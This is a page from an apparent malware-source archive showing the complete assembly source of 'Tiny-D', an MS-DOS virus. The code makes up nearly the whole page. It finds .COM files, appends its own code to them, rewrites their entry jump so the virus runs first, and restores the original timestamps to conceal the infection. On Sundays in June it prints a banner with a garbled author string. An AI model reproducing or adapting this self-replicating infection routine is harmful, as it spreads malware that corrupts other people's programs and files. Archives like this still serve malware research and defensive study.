MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.tinyd.asm
2021-01-12 18:01:59 -06:00

117 lines
5.4 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv
ASSUME SS:tinyv
ASSUME DS:tinyv
H00000 DB 0
H00001 DB 255 DUP(?)
program PROC FAR
ASSUME ES:tinyv
begin:
JMP pgstart ; start program
exlbl LABEL BYTE
db 0CDh, 20h, 7, 8, 9
pgstart:
CALL tinyvir
mnprg PROC NEAR
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP,offset exlbl ; Add to get original offset
LEA DX,[SI+fspec] ; get filespec (*.COM)
SUB CX,CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT 21H ; ----\/----
JC hiccup ; no more files found, terminate virus
MOV DX,009EH ; set file name pointer
MOV AX,3D02H ; open file
INT 21H ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer (?)
MOV CX,0003H ; read 3 bytes
INT 21H ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP nofile
infect:
MOV AX,5700h ; get date function
INT 21h ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
SUB CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT 21H ; do it!
MOV DX,DI ; set dest index to area for buffer (?)
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT 21H ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
SUB DX,DX ; clear regs
SUB CX,CX ; " "
MOV AX,4202H ; move file pointer
INT 21H ; do it!
CMP DX,00H ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT 21H ; do it!
JC exit ; error, bug out
MOV AX,4200H ; move pointer
SUB CX,CX ; clear reg
MOV DX,OFFSET H00001 ; where to set pointer
INT 21H ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
MOV CX,0002H ; two bytes (the JMP)
INT 21H ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT 21h ; do it!
exit:
MOV AH,2Ah ; date function
INT 21h ; do it!
CMP AL,0h ; is it sunday?
JNE closal ; nope, quit
CMP DH,6h ; is it June?
JNE closal ; nope, quit
PUSH BX
PUSH SI
MOV AH,9h ; print string
MOV DX, OFFSET nondata ; string to print
ADD DX,SI
INT 21h ; print it
MOV DX, OFFSET nondat2 ; next string
ADD DX, SI
INT 21h ; print it!
POP BX
closal: MOV AH,3EH ; close file
INT 21H ; do it!
nofile: JMP BP ; go to original file
mnprg ENDP
program ENDP
blnkdat LABEL WORD
DW 0000H
fspec LABEL WORD
DB '*.COM'
DB 0
nondata DB 'Tiny-D version 1.1$ '; Program identification
nondat2 DB ' by <15><><EFBFBD>@&<><EEB7B3>$' ; author identification
endprog LABEL WORD
tinyv ENDS
END program